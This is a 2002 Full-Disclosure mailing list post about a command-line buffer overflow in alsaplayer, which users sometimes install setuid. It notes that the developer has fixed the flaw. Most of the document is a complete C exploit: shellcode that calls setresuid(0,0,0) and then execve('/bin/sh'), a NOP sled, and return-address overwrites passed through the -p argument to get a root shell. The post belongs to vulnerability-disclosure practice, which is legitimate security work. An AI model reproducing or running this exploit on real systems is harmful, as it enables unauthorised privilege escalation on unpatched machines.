From: KF (dotslash_at_snosoft.com)
Date: Fri Sep 20 2002 - 09:42:27 CDT
I noticed that it is very common in the troubleshooting of an
application that uses alsa-sound to set the setuid bit on the binary in
question. One example of this can be found in the archives of the
alsaplayer mailing list:
http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000656.html
and
http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000657.html
I spoke to the developer of alsasound and he promptly fixed the
problems. Although he does not condone the setuid bit on the alsasound
program, the author noted that some users choose to set the bit.
The fixes for the above problem can be found at:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/alsaplayer/alsaplayer/app/Main.cpp.diff?r1=1.66&r2=1.67
http://alsaplayer.org/changelog.php3
Wed Sep 18 11:52:43 CEST 2002
-----------------------------
* Code cleanups
* JACK related updates
* commandline buffer overflow fixes.
...
-KF
/*
* Alsaplayer exploit for a buffer overflow found by KF (snosoft.com)
*
* This program is not installed with special permissions by default.
* However, the author himself does recommend to do so under certain
* conditions:
*
* http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000656.html
* http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000657.html
*
* Author: zillion[at]safemode.org (09/2002)
*
* Tested on Red Hat 7.3 linux with alsaplayer-devel-0.99.71-1
*
*/
#include <stdio.h>      /* printf */
#include <stdlib.h>     /* exit, atoi */
#include <unistd.h>     /* execl, getopt, optarg */
#include <sys/stat.h>   /* stat */
#include <string.h>     /* memset, memcpy, strncpy */

#define BUFFER_SIZE 1056        /* length of the argument handed to -p */
#define NOP 0x90                /* x86 single-byte nop, used for the sled */
#define RET 0xbfffe440          /* guessed stack address inside the sled (Red Hat 7.3) */

/* Linux/x86 shellcode, 52 bytes: setresuid(0,0,0) then execve("/bin/sh") */
char shellcode[]=
"\xeb\x26\x5e\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb0\xa4\xcd\x80"
"\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xd5\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68";

void print_error(char * burb) {
    printf(" Error: %s !\n",burb); exit(0);
}

void usage(char *progname) {
    printf("\n*--- -- - Alsaplayer b0f exploit - -- ---*\n");
    printf("\nDefault: %s -f /path/to/alsaplayer",progname);
    printf("\nOption : %s -o <offset>\n\n",progname);
    exit(0);
}

int main(int argc, char **argv){
    char buffer[BUFFER_SIZE + 1];   /* +1 for the terminating NUL execl expects */
    char file[30] = "";
    long retaddress;                /* 4 bytes on the 32-bit target this was written for */
    int arg,offset=500;
    struct stat sbuf;

    if(argc < 2) { usage(argv[0]); }

    while ((arg = getopt (argc, argv, "f:o:")) != -1){
        switch (arg){
            case 'f':
                strncpy(file,optarg,sizeof(file) - 1);
                file[sizeof(file) - 1] = '\0';
                if(stat(file, &sbuf)) { print_error("No such file");}
                break;
            case 'o':
                offset = atoi(optarg);
                if(offset < 0) { print_error("Offset must be positive");}
                break;
            default :
                usage(argv[0]);
        }
    }
    if(file[0] == '\0') { usage(argv[0]); }

    retaddress = (RET - offset);

    /* NOP sled over the whole argument, shellcode near the end, then two
     * copies of the return address where saved EBP and saved EIP land. */
    memset(buffer,NOP,BUFFER_SIZE);
    memcpy(buffer + BUFFER_SIZE - (sizeof(shellcode) + 8) ,shellcode,sizeof(shellcode) -1);

    /* Overwrite EBP and EIP */
    *(long *)&buffer[BUFFER_SIZE - 8] = retaddress;
    *(long *)&buffer[BUFFER_SIZE - 4] = retaddress;
    buffer[BUFFER_SIZE] = '\0';

    /* The oversized -p argument is what overruns alsaplayer's stack buffer */
    if(execl(file,file,"-p",buffer,NULL) != 0) {
        print_error("Could not execute alsaplayer ");
    }
    return 0;
}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html